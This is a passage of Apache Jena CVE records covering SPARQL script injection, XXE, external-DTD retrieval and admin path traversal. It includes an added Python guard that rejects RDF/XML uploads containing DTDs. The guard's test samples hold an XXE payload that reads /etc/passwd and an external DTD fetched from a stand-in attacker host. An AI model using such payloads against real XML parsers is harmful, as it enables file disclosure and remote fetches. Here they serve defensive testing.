"dateUpdated": "2024-10-07T19:42:49.706Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "s3gundo of Alibaba"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\u003cbr\u003e\u003cp\u003eThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\u003c/p\u003e"
}
],
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-12T07:49:55.432Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"related"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of execution in script engine expressions.",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-32200",
"datePublished": "2023-07-12T07:49:55.432Z",
"dateReserved": "2023-05-04T12:49:34.610Z",
"dateUpdated": "2024-10-07T19:42:49.706Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22665 (GCVE-0-2023-22665)
Vulnerability from cvelistv5 – Published: 2023-04-25 06:44 – Updated: 2025-02-13 16:44
Title
Apache Jena: Exposure of arbitrary execution in script engine expressions.
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
Severity
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Jena |
Affected:
0 , ≤ 4.7.0
(semver)
|
Credits
L3yx of Syclover Security Team
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:13:49.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.7.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L3yx of Syclover Security Team"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-11T20:06:23.134Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of arbitrary execution in script engine expressions.",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-22665",
"datePublished": "2023-04-25T06:44:21.516Z",
"dateReserved": "2023-01-05T14:41:04.515Z",
"dateUpdated": "2025-02-13T16:44:03.940Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-28890 (GCVE-0-2022-28890)
Vulnerability from cvelistv5 – Published: 2022-05-05 08:40 – Updated: 2024-08-03 06:10
Title
Processing external DTDs
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
Severity
No CVSS vector is recorded; the CNA's textual severity is "medium".
CWE
- XML External DTD vulnerability (no CWE id is assigned in the record)
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: all versions ≤ 4.4.0 (custom); the summary states that 4.2.x and 4.3.x do not allow external entities |
Workarounds
Users are advised to upgrade to Apache Jena 4.5.0 or later.
Credits
Apache Jena would like to thank Feras Daragma, Avishag Shapira & Amit Laish (GE Digital, Cyber Security Lab) for their report.
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:10:56.881Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.4.0",
"status": "affected",
"version": "Apache Jena",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
],
"metrics": [
{
"other": {
"content": {
"other": "medium"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External DTD vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-05T08:40:09",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Processing external DTDs",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2022-28890",
"STATE": "PUBLIC",
"TITLE": "Processing external DTDs"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "Apache Jena",
"version_value": "4.4.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "medium"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External DTD vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878",
"refsource": "MISC",
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2022-28890",
"datePublished": "2022-05-05T08:40:09",
"dateReserved": "2022-04-09T00:00:00",
"dateUpdated": "2024-08-03T06:10:56.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-39239 (GCVE-0-2021-39239)
Vulnerability from cvelistv5 – Published: 2021-09-16 14:40 – Updated: 2024-08-04 02:06
Title
XML External Entity (XXE) vulnerability
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
Severity
No CVSS vector is recorded; the CNA's textual severity is "high".
CWE
- XML External Entity (XXE) vulnerability (no CWE id is assigned in the record)
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E | x_refsource_MISC |
| https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E | mailing-list, x_refsource_MLIST |
| https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E | mailing-list, x_refsource_MLIST |
| https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E | mailing-list, x_refsource_MLIST |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: < 4.1.0 (custom) |
Note: the structured range stops below 4.1.0, but the summary says "versions up to 4.1.0" and the workaround is to upgrade to 4.2.0, so treat 4.1.0 itself as affected.
Workarounds
Users are advised to upgrade to Apache Jena 4.2.0 or later.
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:06:40.799Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "4.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
],
"metrics": [
{
"other": {
"content": {
"other": "high"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External Entity (XXE) vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-21T09:06:18",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "XML External Entity (XXE) vulnerability",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-39239",
"STATE": "PUBLIC",
"TITLE": "XML External Entity (XXE) vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "4.1.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "high"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External Entity (XXE) vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E",
"refsource": "MISC",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-39239",
"datePublished": "2021-09-16T14:40:20",
"dateReserved": "2021-08-17T00:00:00",
"dateUpdated": "2024-08-04T02:06:40.799Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
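The two XML records above (CVE-2021-39239 and CVE-2022-28890) describe Jena's RDF/XML parser honouring external entities and external DTDs. The block below is an added example and not Apache Jena code: a pre-ingest guard that refuses RDF/XML carrying a DOCTYPE or an external entity before the bytes reach an XML parser, the compensating control for an upload path that cannot be upgraded yet. It uses Python's expat bindings, which report DOCTYPE and entity declarations without fetching anything; the sample documents and the host attacker.example are constructed for the demonstration.

```python
"""Pre-ingest guard for RDF/XML uploads: detect DOCTYPE and external entity
declarations before the document reaches an XML parser.

Added example for the CVE-2021-39239 / CVE-2022-28890 records; not Apache Jena
code. The fix for those issues is upgrading Jena (4.2.0 and 4.5.0 or later);
this guard is a compensating control for an ingest path that cannot be
upgraded yet. Sample documents below are constructed for the demo and
attacker.example is a placeholder host.
"""
import xml.parsers.expat


def find_dtd_risks(xml_bytes):
    """Scan the prolog and return findings that would make a DTD-processing
    XML parser retrieve or expand something it should not. An empty list
    means the document carries no DOCTYPE at all.

    No ExternalEntityRefHandler is installed, so expat reports external DTDs
    and external entities here but never fetches them.
    """
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append(
                f"external DTD subset on DOCTYPE {name}: "
                f"system={system_id!r} public={public_id!r}"
            )
        else:
            findings.append(f"DOCTYPE {name} with internal subset only")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id or public_id:
            kind = "parameter" if is_param else "general"
            findings.append(
                f"external {kind} entity {name}: "
                f"system={system_id!r} public={public_id!r}"
            )
        else:
            findings.append(f"internal entity {name} ({len(value or '')} bytes)")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"not well-formed: {exc}")
    return findings


def is_safe_rdfxml(xml_bytes):
    """Demo policy: RDF/XML never needs a DTD, so any finding (DOCTYPE,
    entity declaration, or parse error) rejects the upload."""
    return not find_dtd_risks(xml_bytes)


# Constructed samples.
SAMPLE_CLEAN = b"""<?xml version="1.0"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:ex="http://example.org/">
  <rdf:Description rdf:about="http://example.org/a"><ex:p>ok</ex:p></rdf:Description>
</rdf:RDF>"""

SAMPLE_EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE rdf:RDF SYSTEM "http://attacker.example/evil.dtd">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/>"""

SAMPLE_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:ex="http://example.org/">
  <rdf:Description rdf:about="http://example.org/a"><ex:p>&xxe;</ex:p></rdf:Description>
</rdf:RDF>"""

if __name__ == "__main__":
    for label, doc in (("clean", SAMPLE_CLEAN),
                       ("external-dtd", SAMPLE_EXTERNAL_DTD),
                       ("xxe", SAMPLE_XXE)):
        verdict = "accepted" if is_safe_rdfxml(doc) else "rejected"
        print(label, verdict, find_dtd_risks(doc))
```

The policy rejects any DOCTYPE outright rather than trying to tell a harmless internal subset from an entity-expansion payload, because RDF/XML has no legitimate use for one. Upgrading remains the actual fix: the parser inside Jena is the component that would retrieve the external resource, and this guard only keeps such documents from reaching it.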
CVE-2025-50151 (GCVE-0-2025-50151)
Vulnerability from nvd – Published: 2025-07-21 09:32 – Updated: 2025-11-04 21:11
Title
Apache Jena: Configuration files uploaded by administrative users are not checked properly
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
Severity
The CNA records no CVSS vector and rates the issue "important". CISA ADP vulnrichment supplies CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (8.8, High); note that the summary requires administrator access, which CVSS would normally score as PR:H rather than PR:L.
CWE
- CWE-20 - Improper Input Validation
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss | vendor-advisory |
| http://www.openwall.com/lists/oss-security/2025/07/21/2 | |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: all versions ≤ 5.4.0 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:40:14.417556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:41:06.294Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:34.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eFile access paths in configuration files uploaded by users with administrator access are not validated.\u003c/div\u003e\u003cdiv\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.\u003c/p\u003e\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:32:30.334Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Configuration files uploaded by administrative users are not check properly",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-50151",
"datePublished": "2025-07-21T09:32:30.334Z",
"dateReserved": "2025-06-13T16:13:26.895Z",
"dateUpdated": "2025-11-04T21:11:34.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-49656 (GCVE-0-2025-49656)
Vulnerability from nvd – Published: 2025-07-21 09:30 – Updated: 2025-11-04 21:11
Title
Apache Jena: Administrative users can create files outside the server directory space via the admin UI
Summary
Users with administrator access can create database files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
Severity
The CNA records no CVSS vector and rates the issue "important". CISA ADP vulnrichment supplies CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5, High); the PR:N in that vector does not match the summary, which requires administrator access, so re-score with elevated privileges when prioritising.
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq | vendor-advisory |
| http://www.openwall.com/lists/oss-security/2025/07/21/1 | |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: all versions ≤ 5.4.0 (semver) |
Credits
Noriaki Iwasaki; Cyber Defense Institute, Inc
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-49656",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:46:28.661133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:47:08.462Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:14.792Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Noriaki Iwasaki; Cyber Defense Institute, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers with administrator access can create databases files outside the files area of the Fuseki server.\u003c/p\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
